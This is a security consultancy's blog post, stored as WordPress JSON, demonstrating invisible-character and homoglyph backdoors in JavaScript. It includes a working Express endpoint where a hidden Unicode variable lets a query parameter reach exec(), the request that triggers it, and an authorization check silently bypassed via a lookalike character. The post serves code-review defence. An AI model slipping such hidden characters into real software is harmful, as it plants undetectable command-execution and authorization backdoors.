{"id":738,"date":"2021-11-09T13:31:47","date_gmt":"2021-11-09T11:31:47","guid":{"rendered":"https:\/\/certitude.consulting\/blog\/?p=738"},"modified":"2022-01-19T14:57:01","modified_gmt":"2022-01-19T12:57:01","slug":"invisible-backdoor","status":"publish","type":"post","link":"https:\/\/certitude.consulting\/blog\/en\/invisible-backdoor\/","title":{"rendered":"The Invisible JavaScript Backdoor"},"content":{"rendered":"\n<p>A few months ago we saw a <a href=\"https:\/\/www.reddit.com\/r\/programminghorror\/comments\/o9dm6r\/i_was_getting_errors_and_couldnt_pinpoint_it\/\" data-type=\"URL\" data-id=\"https:\/\/www.reddit.com\/r\/programminghorror\/comments\/o9dm6r\/i_was_getting_errors_and_couldnt_pinpoint_it\/\" target=\"_blank\" rel=\"noreferrer noopener\">post <\/a>on the <em>r\/programminghorror<\/em> subreddit: A developer describes the struggle of identifying a syntax error resulting from an invisible Unicode character hidden in JavaScript source code. This post inspired an idea: What if a backdoor <em>literally <\/em>cannot be <em>seen<\/em> and thus evades detection even from <em>thorough <\/em>code reviews?<\/p>\n\n\n\n<p>Just as we were finishing up this blog post, a team at the University of Cambridge released a <a href=\"https:\/\/www.trojansource.codes\/\">paper<\/a> describing such an attack. Their approach, however, is quite different from ours &#8211; it focuses on the Unicode bidirectional mechanism (Bidi). We have implemented a different take on what the paper titles &#8220;<em>Invisible Character Attacks<\/em>&#8221; and &#8220;<em>Homoglyph Attacks<\/em>&#8220;.<\/p>\n\n\n\n<p>Without further ado, here&#8217;s the <em>backdoor<\/em>. 
Can you spot it?<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>const express = require('express');\nconst util = require('util');\nconst exec = util.promisify(require('child_process').exec);\n\nconst app = express();\n\napp.get('\/network_health', async (req, res) =&gt; {\n    const { timeout,\u3164} = req.query;\n    const checkCommands = &#91;\n        'ping -c 1 google.com',\n        'curl -s http:\/\/example.com\/',\u3164\n    ];\n\n    try {\n        await Promise.all(checkCommands.map(cmd =&gt; \n                cmd &amp;&amp; exec(cmd, { timeout: +timeout || 5_000 })));\n        res.status(200);\n        res.send('ok');\n    } catch(e) {\n        res.status(500);\n        res.send('failed');\n    }\n});\n\napp.listen(8080);<\/code><\/pre>\n\n\n\n<p>The script implements a very simple network health check HTTP endpoint that executes <code>ping -c 1 google.com<\/code> as well as <code>curl -s http:\/\/example.com<\/code> and returns whether these commands executed successfully. The optional HTTP parameter <code>timeout<\/code> limits the command execution time.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">The Backdoor<\/h2>\n\n\n\n<p>Our approach for creating the backdoor was first to find an invisible Unicode character that can be interpreted as an identifier\/variable in JavaScript. Beginning with ECMAScript 2015, all Unicode characters with the Unicode property <code>ID_Start<\/code> can be used in identifiers (characters with property <code>ID_Continue<\/code> can be used after the initial character).<\/p>\n\n\n\n<p>The character &#8220;\u3164&#8221; (0x3164 in hex) is called <em>&#8220;HANGUL FILLER&#8221;<\/em> and belongs to the Unicode category <em>&#8220;Letter, other&#8221;<\/em>. As this character is considered to be a <em>letter<\/em>, it has the <code>ID_Start<\/code> property and can therefore appear in a JavaScript variable name &#8211; perfect!<\/p>\n\n\n\n<p>Next, a way to use this invisible character <em>unnoticed <\/em>had to be found. 
The following visualizes the chosen approach by replacing the character in question with its <em>escape sequence<\/em> representation:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>    const { timeout,<strong>\\u3164<\/strong>} = req.query;<\/code><\/pre>\n\n\n\n<p>A <a rel=\"noreferrer noopener\" href=\"https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/JavaScript\/Reference\/Operators\/Destructuring_assignment\" target=\"_blank\">destructuring assignment<\/a> is used to unpack the HTTP parameters from <code>req.query<\/code>. Contrary to what can be <em>seen<\/em>, the parameter <code>timeout<\/code> is not the sole parameter unpacked from the <code>req.query<\/code> attribute! An additional variable\/HTTP parameter named &#8220;\u3164&#8221; is retrieved &#8211; if an HTTP parameter named &#8220;\u3164&#8221; is passed, it is assigned to the invisible variable <code>\u3164<\/code>.<\/p>\n\n\n\n<p>Similarly, when the <code>checkCommands<\/code> array is constructed, this variable <code>\u3164<\/code> is included in the array:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>    const checkCommands = &#91;\n        'ping -c 1 google.com',\n        'curl -s http:\/\/example.com\/',<strong>\\u3164<\/strong>\n    ];<\/code><\/pre>\n\n\n\n<p>Each element in the array, the hardcoded commands as well as the user-supplied parameter, is then passed to the <code>exec<\/code> function. This function executes OS commands. 
For an attacker to execute arbitrary OS commands, they would have to pass a parameter named &#8220;\u3164&#8221; (in its URL-encoded form) to the endpoint:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>http:\/\/host:8080\/network_health?%E3%85%A4=<span style=\"text-decoration: underline;\">&lt;any command&gt;<\/span><\/code><\/pre>\n\n\n\n<p>This approach cannot be detected through syntax highlighting as invisible characters are not shown at all and therefore are not colorized by the IDE\/text editor:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/certitude.consulting\/blog\/wp-content\/uploads\/2021\/11\/hangul_filler_backdoor.png\" alt=\"\" class=\"wp-image-765\" width=\"844\" height=\"683\" srcset=\"https:\/\/certitude.consulting\/blog\/wp-content\/uploads\/2021\/11\/hangul_filler_backdoor.png 844w, https:\/\/certitude.consulting\/blog\/wp-content\/uploads\/2021\/11\/hangul_filler_backdoor-300x243.png 300w, https:\/\/certitude.consulting\/blog\/wp-content\/uploads\/2021\/11\/hangul_filler_backdoor-768x621.png 768w\" sizes=\"auto, (max-width: 844px) 100vw, 844px\" \/><\/figure>\n\n\n\n<p>The attack requires the IDE\/text editor (and the font in use) to correctly render the invisible characters. At least <em>Notepad++<\/em> and <em>VS Code<\/em> render it correctly (in VS Code the invisible character is slightly wider than ASCII characters). The script behaves as described at least with Node 14.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Homoglyph Approaches<\/h2>\n\n\n\n<p>Besides <em>invisible<\/em> characters one could also introduce backdoors using Unicode characters that look <em>very similar <\/em>to e.g. 
operators:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>const &#91; ENV_PROD, ENV_DEV ] = &#91; 'PRODUCTION', 'DEVELOPMENT'];\n\/* \u2026 *\/\nconst environment = 'PRODUCTION';\n\/* \u2026 *\/\nfunction isUserAdmin(user) {\n    if(environment\u01c3=ENV_PROD){\n        \/\/ bypass authZ checks in DEV\n        return true;\n    }\n\n    \/* \u2026 *\/\n    return false;\n}<\/code><\/pre>\n\n\n\n<p>The &#8220;\u01c3&#8221; character used is not an exclamation mark but an &#8220;<em>ALVEOLAR CLICK<\/em>&#8221; character. The following line therefore does not compare the variable <code>environment<\/code> to the string <code>\"PRODUCTION\"<\/code> but instead assigns the string <code>\"PRODUCTION\"<\/code> to the previously undefined variable <code>environment\u01c3<\/code>:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>    if(environment\u01c3=ENV_PROD){<\/code><\/pre>\n\n\n\n<p>Thus, the expression within the if statement always evaluates to a truthy value (tested with Node 14).<\/p>\n\n\n\n<p>There are many other characters that look similar to the ones used in code which may be used for such purposes (e.g. &#8220;\uff0f&#8221;, &#8220;\u2212&#8221;, &#8220;\uff0b&#8221;, &#8220;\u2a75&#8221;, &#8220;\u2768&#8221;, &#8220;\u2afd&#8221;, &#8220;\ua4ff&#8221;, &#8220;\u2217&#8221;). Unicode calls these characters <a href=\"https:\/\/unicode.org\/reports\/tr36\/#visual_spoofing\" target=\"_blank\" rel=\"noreferrer noopener\">&#8220;confusables&#8221;<\/a>. 
<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Takeaway<\/h2>\n\n\n\n<p>Note that messing with Unicode to hide vulnerable or malicious code is <a rel=\"noreferrer noopener\" href=\"https:\/\/github.com\/NebulousLabs\/glyphcheck\" target=\"_blank\">not<\/a> <a rel=\"noreferrer noopener\" href=\"https:\/\/twitter.com\/zygoloid\/status\/1187150150835195905\" target=\"_blank\">a<\/a> <a rel=\"noreferrer noopener\" href=\"https:\/\/github.com\/golang\/go\/issues\/20209\" target=\"_blank\">new<\/a> <a rel=\"noreferrer noopener\" href=\"https:\/\/twitter.com\/jupenur\/status\/1244286243518713857\" target=\"_blank\">idea<\/a> (also using <a rel=\"noreferrer noopener\" href=\"https:\/\/mobile.twitter.com\/veorq\/status\/843382644939374592\" target=\"_blank\">invisible characters<\/a>) and Unicode inherently opens up additional possibilities to <a rel=\"noreferrer noopener\" href=\"https:\/\/twitter.com\/FiloSottile\/status\/1455260886910783501\" target=\"_blank\">obfuscate code<\/a>. We believe that these tricks are quite neat though, which is why we wanted to share them.<\/p>\n\n\n\n<p>Unicode should be kept in mind when doing reviews of code from unknown or untrusted contributors. This is especially interesting for open source projects as they might receive contributions from developers who are effectively anonymous. <\/p>\n\n\n\n<p>The Cambridge team proposes restricting Bidi Unicode characters. As we have shown, homoglyph attacks and invisible characters can pose a threat as well. In our experience non-ASCII characters are pretty rare in code. Many development teams choose to use English as the primary development language (both for code and strings within the code) in order to allow for international cooperation (ASCII covers all\/most characters used in the English language). Translation into other languages is often done using dedicated files. When we review German language code, we mostly see non-ASCII characters being substituted with ASCII characters (e.g. 
\u00e4 \u2192 ae, \u00df \u2192 ss). It might therefore be a good idea to disallow any non-ASCII characters.<\/p>\n\n\n\n<p><strong>Update:<\/strong><\/p>\n\n\n\n<p>VS Code has issued an update that highlights invisible characters and confusables: <a href=\"https:\/\/code.visualstudio.com\/updates\/v1_63#_unicode-highlighting\">https:\/\/code.visualstudio.com\/updates\/v1_63#_unicode-highlighting<\/a><\/p>\n\n\n\n<p>Unicode is forming a task force to investigate issues with source code spoofing: <a href=\"https:\/\/www.unicode.org\/L2\/L2022\/22007-avoiding-spoof.pdf\">https:\/\/www.unicode.org\/L2\/L2022\/22007-avoiding-spoof.pdf<\/a><\/p>\n\n\n\n<hr class=\"wp-block-separator\"\/>\n\n\n\n<p>Cert<span style=\"text-decoration: underline;\">it<\/span>ude&#8217;s employees have many years of experience in code reviews and expertise in many languages and frameworks. If you are interested in working with Cert<span style=\"text-decoration: underline;\">it<\/span>ude to improve your application&#8217;s security, feel free to reach out to us at office@certitude.consulting.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>A few months ago we saw a post on the r\/programminghorror subreddit: A developer describes the struggle of identifying a syntax error resulting from an invisible Unicode character hidden in JavaScript source code. This post inspired an idea: What if a backdoor literally cannot be seen and thus evades detection even from thorough code reviews? 
[&hellip;]<\/p>\n","protected":false},"author":4,"featured_media":765,"comment_status":"closed","ping_status":"open","sticky":true,"template":"","format":"standard","meta":{"footnotes":""},"categories":[60],"tags":[175,86,178,176],"class_list":["post-738","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-technical-analysis","tag-backdoor","tag-research","tag-trojansource","tag-unicode"],"_links":{"self":[{"href":"https:\/\/certitude.consulting\/blog\/wp-json\/wp\/v2\/posts\/738","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/certitude.consulting\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/certitude.consulting\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/certitude.consulting\/blog\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/certitude.consulting\/blog\/wp-json\/wp\/v2\/comments?post=738"}],"version-history":[{"count":34,"href":"https:\/\/certitude.consulting\/blog\/wp-json\/wp\/v2\/posts\/738\/revisions"}],"predecessor-version":[{"id":977,"href":"https:\/\/certitude.consulting\/blog\/wp-json\/wp\/v2\/posts\/738\/revisions\/977"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/certitude.consulting\/blog\/wp-json\/wp\/v2\/media\/765"}],"wp:attachment":[{"href":"https:\/\/certitude.consulting\/blog\/wp-json\/wp\/v2\/media?parent=738"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/certitude.consulting\/blog\/wp-json\/wp\/v2\/categories?post=738"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/certitude.consulting\/blog\/wp-json\/wp\/v2\/tags?post=738"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}